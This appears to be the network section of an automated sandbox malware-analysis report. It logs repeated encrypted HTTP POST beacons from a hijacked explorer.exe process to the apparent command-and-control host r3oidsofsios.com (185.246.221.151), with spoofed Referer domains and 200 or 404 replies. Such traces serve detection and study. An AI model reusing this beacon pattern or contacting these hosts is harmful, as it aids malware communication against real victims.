                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 72 33 6f 69 64 73 6f 66 73 69 6f 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at r3oidsofsios.com Port 80</address></body></html>


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          24192.168.2.749739185.246.221.15180C:\Windows\explorer.exe
                          TimestampkBytes transferredDirectionData
                          Nov 30, 2022 00:12:38.844290018 CET329OUTPOST / HTTP/1.1
                          Connection: Keep-Alive
                          Content-Type: application/x-www-form-urlencoded
                          Accept: */*
                          Referer: http://hrxqxa.net/
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                          Content-Length: 253
                          Host: r3oidsofsios.com
                          Nov 30, 2022 00:12:38.844290018 CET329OUTData Raw: a4 60 f3 79 88 44 d6 5c 28 b8 4a 80 9b 13 d8 49 cd ac d5 12 f1 ff ec d5 60 c6 0b 8b 04 da 64 4b c9 4f 41 f0 79 b4 e3 2f dd 23 7b e9 3a fe f6 9e 82 73 db c2 b0 91 d5 bb 20 52 b6 37 0d e1 65 1d d4 39 e2 12 d0 66 80 02 1f d3 26 f2 fe 75 cb 61 24 0d
                          Data Ascii: `yD\(JI`dKOAy/#{:s R7e9f&ua$/8R;5}w(_vhbU(%L"@X |)*b5$ws&hB#*)Y(t+Ik&N\ys/+FpideY.
                          Nov 30, 2022 00:12:38.964234114 CET330INHTTP/1.1 404 Not Found
                          Date: Tue, 29 Nov 2022 23:12:38 GMT
                          Server: Apache/2.4.41 (Ubuntu)
                          Content-Length: 404
                          Connection: close
                          Content-Type: text/html; charset=utf-8
                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 72 33 6f 69 64 73 6f 66 73 69 6f 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at r3oidsofsios.com Port 80</address></body></html>


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          25192.168.2.749740185.246.221.15180C:\Windows\explorer.exe
                          TimestampkBytes transferredDirectionData
                          Nov 30, 2022 00:12:39.079370022 CET331OUTPOST / HTTP/1.1
                          Connection: Keep-Alive
                          Content-Type: application/x-www-form-urlencoded
                          Accept: */*
                          Referer: http://uwoxt.net/
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                          Content-Length: 363
                          Host: r3oidsofsios.com
                          Nov 30, 2022 00:12:39.079370022 CET331OUTData Raw: a4 60 f3 79 88 44 d6 5c 28 b8 4a 80 9b 13 d8 49 cd ac d5 12 f1 ff ec d5 60 c6 0b 8b 04 da 64 4b c9 4f 41 f0 79 b4 e3 2f dd 23 7b e9 3a fe f6 9e 82 73 db c2 b0 91 d5 bb 20 52 b6 37 0d e1 65 1d d4 39 e2 12 d0 66 8f 02 1f d3 26 f2 fe 75 bf 7f 1b 44
                          Data Ascii: `yD\(JI`dKOAy/#{:s R7e9f&uDQWAAH~"zU-w7Z^F]HFrTJH*bsk\sQUA2[jd7sQ|`#'VSU?bEWd2*L-DXV0g@;1q,F6
                          Nov 30, 2022 00:12:39.204178095 CET332INHTTP/1.1 404 Not Found
                          Date: Tue, 29 Nov 2022 23:12:39 GMT
                          Server: Apache/2.4.41 (Ubuntu)
                          Content-Length: 404
                          Connection: close
                          Content-Type: text/html; charset=utf-8
                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 72 33 6f 69 64 73 6f 66 73 69 6f 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at r3oidsofsios.com Port 80</address></body></html>


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          26192.168.2.749741185.246.221.15180C:\Windows\explorer.exe
                          TimestampkBytes transferredDirectionData
                          Nov 30, 2022 00:12:39.321549892 CET333OUTPOST / HTTP/1.1
                          Connection: Keep-Alive
                          Content-Type: application/x-www-form-urlencoded
                          Accept: */*
                          Referer: http://bqruytosp.com/
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                          Content-Length: 285
                          Host: r3oidsofsios.com
                          Nov 30, 2022 00:12:39.321588993 CET333OUTData Raw: a4 60 f3 79 88 44 d6 5c 28 b8 4a 80 9b 13 d8 49 cd ac d5 12 f1 ff ec d5 60 c6 0b 8b 04 da 64 4b c9 4f 41 f0 79 b4 e3 2f dd 23 7b e9 3a fe f6 9e 82 73 db c2 b0 91 d5 bb 20 52 b6 37 0d e1 65 1d d4 39 e2 12 d0 66 8e 02 1f d3 26 f2 fe 75 d2 12 0f 4e
                          Data Ascii: `yD\(JI`dKOAy/#{:s R7e9f&uN|O&SVD?@7^6 7>W^2R.^x"{[Fa#4%O]K_OX_Vpr`q]'"#=>;UxV];~w/BY4,tkpOwV
                          Nov 30, 2022 00:12:39.438452959 CET334INHTTP/1.1 404 Not Found
                          Date: Tue, 29 Nov 2022 23:12:39 GMT
                          Server: Apache/2.4.41 (Ubuntu)
                          Content-Length: 404
                          Connection: close
                          Content-Type: text/html; charset=utf-8
                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 72 33 6f 69 64 73 6f 66 73 69 6f 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at r3oidsofsios.com Port 80</address></body></html>


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          27192.168.2.749742185.246.221.15180C:\Windows\explorer.exe
                          TimestampkBytes transferredDirectionData
                          Nov 30, 2022 00:12:40.168219090 CET334OUTPOST / HTTP/1.1
                          Connection: Keep-Alive
                          Content-Type: application/x-www-form-urlencoded
                          Accept: */*
                          Referer: http://lclth.com/
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                          Content-Length: 257
                          Host: r3oidsofsios.com
                          Nov 30, 2022 00:12:40.168253899 CET335OUTData Raw: a4 60 f3 79 88 44 d6 5c 28 b8 4a 80 9b 13 d8 49 cd ac d5 12 f1 ff ec d5 60 c6 0b 8b 04 da 64 4b c9 4f 41 f0 79 b4 e3 2f dd 23 7b e9 3a fe f6 9e 82 73 db c2 b0 91 d5 bb 20 52 b6 37 0d e1 65 1d d4 39 e2 12 d0 66 8d 02 1f d3 26 f2 fe 75 ad 17 2e 09
                          Data Ascii: `yD\(JI`dKOAy/#{:s R7e9f&u.^j|&)Rc5WiP#lGW1h)64|Kf2#+P^}d4+oVeA$$LNSkqe_>W/%&B==]]d8unF8G@Dn$l/Bz
                          Nov 30, 2022 00:12:40.297549009 CET335INHTTP/1.1 404 Not Found
                          Date: Tue, 29 Nov 2022 23:12:40 GMT
                          Server: Apache/2.4.41 (Ubuntu)
                          Content-Length: 404
                          Connection: close
                          Content-Type: text/html; charset=utf-8
                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 72 33 6f 69 64 73 6f 66 73 69 6f 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at r3oidsofsios.com Port 80</address></body></html>


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          28192.168.2.749743185.246.221.15180C:\Windows\explorer.exe
                          TimestampkBytes transferredDirectionData
                          Nov 30, 2022 00:12:40.415658951 CET336OUTPOST / HTTP/1.1
                          Connection: Keep-Alive
                          Content-Type: application/x-www-form-urlencoded
                          Accept: */*
                          Referer: http://vreqndf.com/
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                          Content-Length: 261
                          Host: r3oidsofsios.com
                          Nov 30, 2022 00:12:40.415714025 CET337OUTData Raw: a4 60 f3 79 88 44 d6 5c 28 b8 4a 80 9b 13 d8 49 cd ac d5 12 f1 ff ec d5 60 c6 0b 8b 04 da 64 4b c9 4f 41 f0 79 b4 e3 2f dd 23 7b e9 3a fe f6 9e 82 73 db c2 b0 91 d5 bb 20 52 b6 37 0d e1 65 1d d4 39 e2 12 d0 66 8c 02 1f d3 26 f2 fe 75 d7 69 2e 57
                          Data Ascii: `yD\(JI`dKOAy/#{:s R7e9f&ui.WN|<:)&s9[(5BU[D^X,j')4Z psd3!sl4-(q*6a2w.kdG_[TP![+W_rwZ-*R~xE$ix,w:+ A
                          Nov 30, 2022 00:12:40.529710054 CET337INHTTP/1.1 404 Not Found
                          Date: Tue, 29 Nov 2022 23:12:40 GMT
                          Server: Apache/2.4.41 (Ubuntu)
                          Content-Length: 404
                          Connection: close
                          Content-Type: text/html; charset=utf-8
                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 72 33 6f 69 64 73 6f 66 73 69 6f 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at r3oidsofsios.com Port 80</address></body></html>


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          3192.168.2.749718185.246.221.15180C:\Windows\explorer.exe
                          TimestampkBytes transferredDirectionData
                          Nov 30, 2022 00:12:33.241688967 CET296OUTPOST / HTTP/1.1
                          Connection: Keep-Alive
                          Content-Type: application/x-www-form-urlencoded
                          Accept: */*
                          Referer: http://hraesy.net/
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                          Content-Length: 179
                          Host: r3oidsofsios.com
                          Nov 30, 2022 00:12:33.241713047 CET296OUTData Raw: a4 60 f3 79 88 44 d6 5c 28 b8 4a 80 9b 13 d8 49 cd ac d5 12 f1 ff ec d5 60 c6 0b 8b 04 da 64 4b c9 4f 41 f0 79 b4 e3 2f dd 23 7b e9 3a fe f6 9e 82 73 db c2 b0 91 d5 bb 20 52 b6 37 0d e1 65 1d d4 39 e2 12 d0 66 95 02 1f d3 26 f2 fe 75 ae 44 49 0e
                          Data Ascii: `yD\(JI`dKOAy/#{:s R7e9f&uDI,%j"X`]aQD\`fjc/+0$h-MUz>!4?p-nUmV{tN
                          Nov 30, 2022 00:12:33.362689018 CET296INHTTP/1.1 200 OK
                          Date: Tue, 29 Nov 2022 23:12:33 GMT
                          Server: Apache/2.4.41 (Ubuntu)
                          Content-Length: 0
                          Connection: close
                          Content-Type: text/html; charset=utf-8


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          4192.168.2.749719185.246.221.15180C:\Windows\explorer.exe
                          TimestampkBytes transferredDirectionData
                          Nov 30, 2022 00:12:33.879952908 CET297OUTPOST / HTTP/1.1
                          Connection: Keep-Alive
                          Content-Type: application/x-www-form-urlencoded
                          Accept: */*
                          Referer: http://vqnwxa.org/
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                          Content-Length: 307
                          Host: r3oidsofsios.com
                          Nov 30, 2022 00:12:33.882788897 CET298OUTData Raw: a4 60 f3 79 88 44 d6 5c 28 b8 4a 80 9b 13 d8 49 cd ac d5 12 f1 ff ec d5 60 c6 0b 8b 04 da 64 4b c9 4f 41 f0 79 b4 e3 2f dd 23 7b e9 3a fe f6 9e 82 73 db c2 b0 91 d5 bb 20 52 b6 37 0d e1 65 1d d4 39 e2 12 d0 66 94 02 1f d3 26 f2 fe 75 f7 5f 43 3a
                          Data Ascii: `yD\(JI`dKOAy/#{:s R7e9f&u_C:.h(If/Z@~<ZhCtI}?uhj^o$1XiE;XHYG*cqtKWQZNK"19{wq:4tnZ90Lbw't@\
                          Nov 30, 2022 00:12:34.002124071 CET298INHTTP/1.1 200 OK
                          Date: Tue, 29 Nov 2022 23:12:33 GMT
                          Server: Apache/2.4.41 (Ubuntu)
                          Content-Length: 0
                          Connection: close
                          Content-Type: text/html; charset=utf-8


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          5192.168.2.749720185.246.221.15180C:\Windows\explorer.exe
                          TimestampkBytes transferredDirectionData
                          Nov 30, 2022 00:12:34.067845106 CET299OUTPOST / HTTP/1.1
                          Connection: Keep-Alive
                          Content-Type: application/x-www-form-urlencoded
                          Accept: */*
                          Referer: http://sqyiaue.net/
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                          Content-Length: 288
                          Host: r3oidsofsios.com
                          Nov 30, 2022 00:12:34.068521023 CET299OUTData Raw: a4 60 f3 79 88 44 d6 5c 28 b8 4a 80 9b 13 d8 49 cd ac d5 12 f1 ff ec d5 60 c6 0b 8b 04 da 64 4b c9 4f 41 f0 79 b4 e3 2f dd 23 7b e9 3a fe f6 9e 82 73 db c2 b0 91 d5 bb 20 52 b6 37 0d e1 65 1d d4 39 e2 12 d0 66 93 02 1f d3 26 f2 fe 75 aa 71 1c 48
                          Data Ascii: `yD\(JI`dKOAy/#{:s R7e9f&uqHA?3]JNV2aA4I0<P$#SfMpA;)zDzjg%rfdGtAMSrRcq?A<EL>Zg~k{JNc/O-M^UlD%&Q4
                          Nov 30, 2022 00:12:34.185307026 CET299INHTTP/1.1 200 OK
                          Date: Tue, 29 Nov 2022 23:12:34 GMT
                          Server: Apache/2.4.41 (Ubuntu)
                          Content-Length: 0
                          Connection: close
                          Content-Type: text/html; charset=utf-8


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          6192.168.2.749721185.246.221.15180C:\Windows\explorer.exe
                          TimestampkBytes transferredDirectionData
                          Nov 30, 2022 00:12:34.521208048 CET300OUTPOST / HTTP/1.1
                          Connection: Keep-Alive
                          Content-Type: application/x-www-form-urlencoded
                          Accept: */*
                          Referer: http://cygghp.com/
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                          Content-Length: 217
                          Host: r3oidsofsios.com
                          Nov 30, 2022 00:12:34.524586916 CET300OUTData Raw: a4 60 f3 79 88 44 d6 5c 28 b8 4a 80 9b 13 d8 49 cd ac d5 12 f1 ff ec d5 60 c6 0b 8b 04 da 64 4b c9 4f 41 f0 79 b4 e3 2f dd 23 7b e9 3a fe f6 9e 82 73 db c2 b0 91 d5 bb 20 52 b6 37 0d e1 65 1d d4 39 e2 12 d0 66 92 02 1f d3 26 f2 fe 75 ea 65 5b 25
                          Data Ascii: `yD\(JI`dKOAy/#{:s R7e9f&ue[%3XtPW5(,\78</fKU.a-pi]B]?Jo#eyws/jrBth{C =,3{KWu5
                          Nov 30, 2022 00:12:34.641350031 CET301INHTTP/1.1 200 OK
                          Date: Tue, 29 Nov 2022 23:12:34 GMT
                          Server: Apache/2.4.41 (Ubuntu)
                          Content-Length: 0
                          Connection: close
                          Content-Type: text/html; charset=utf-8


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          7192.168.2.749722185.246.221.15180C:\Windows\explorer.exe
                          TimestampkBytes transferredDirectionData
                          Nov 30, 2022 00:12:34.698724031 CET301OUTPOST / HTTP/1.1
                          Connection: Keep-Alive
                          Content-Type: application/x-www-form-urlencoded
                          Accept: */*
                          Referer: http://dtxwodx.net/
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                          Content-Length: 127
                          Host: r3oidsofsios.com
                          Nov 30, 2022 00:12:34.698757887 CET302OUTData Raw: a4 60 f3 79 88 44 d6 5c 28 b8 4a 80 9b 13 d8 49 cd ac d5 12 f1 ff ec d5 60 c6 0b 8b 04 da 64 4b c9 4f 41 f0 79 b4 e3 2f dd 23 7b e9 3a fe f6 9e 82 73 db c2 b0 91 d5 bb 20 52 b6 37 0d e1 65 1d d4 39 e2 12 d0 66 91 02 1f d3 26 f2 fe 75 a4 13 01 37
                          Data Ascii: `yD\(JI`dKOAy/#{:s R7e9f&u7fB(M')@."^T:"-ATCC'v
                          Nov 30, 2022 00:12:34.817260981 CET302INHTTP/1.1 200 OK
                          Date: Tue, 29 Nov 2022 23:12:34 GMT
                          Server: Apache/2.4.41 (Ubuntu)
                          Content-Length: 0
                          Connection: close
                          Content-Type: text/html; charset=utf-8


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          8192.168.2.749723185.246.221.15180C:\Windows\explorer.exe
                          TimestampkBytes transferredDirectionData
                          Nov 30, 2022 00:12:34.881849051 CET303OUTPOST / HTTP/1.1
                          Connection: Keep-Alive
                          Content-Type: application/x-www-form-urlencoded
                          Accept: */*
                          Referer: http://wypuksbjb.org/
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                          Content-Length: 177
                          Host: r3oidsofsios.com
                          Nov 30, 2022 00:12:34.881849051 CET303OUTData Raw: a4 60 f3 79 88 44 d6 5c 28 b8 4a 80 9b 13 d8 49 cd ac d5 12 f1 ff ec d5 60 c6 0b 8b 04 da 64 4b c9 4f 41 f0 79 b4 e3 2f dd 23 7b e9 3a fe f6 9e 82 73 db c2 b0 91 d5 bb 20 52 b6 37 0d e1 65 1d d4 39 e2 12 d0 66 90 02 1f d3 26 f2 fe 75 b1 77 2e 33
                          Data Ascii: `yD\(JI`dKOAy/#{:s R7e9f&uw.39nHk9I ~xl.==xTgt7;>J\C14w<e9T_b9UX)hT
                          Nov 30, 2022 00:12:35.017662048 CET304INHTTP/1.1 404 Not Found
                          Date: Tue, 29 Nov 2022 23:12:34 GMT
                          Server: Apache/2.4.41 (Ubuntu)
                          Content-Length: 404
                          Connection: close
                          Content-Type: text/html; charset=utf-8
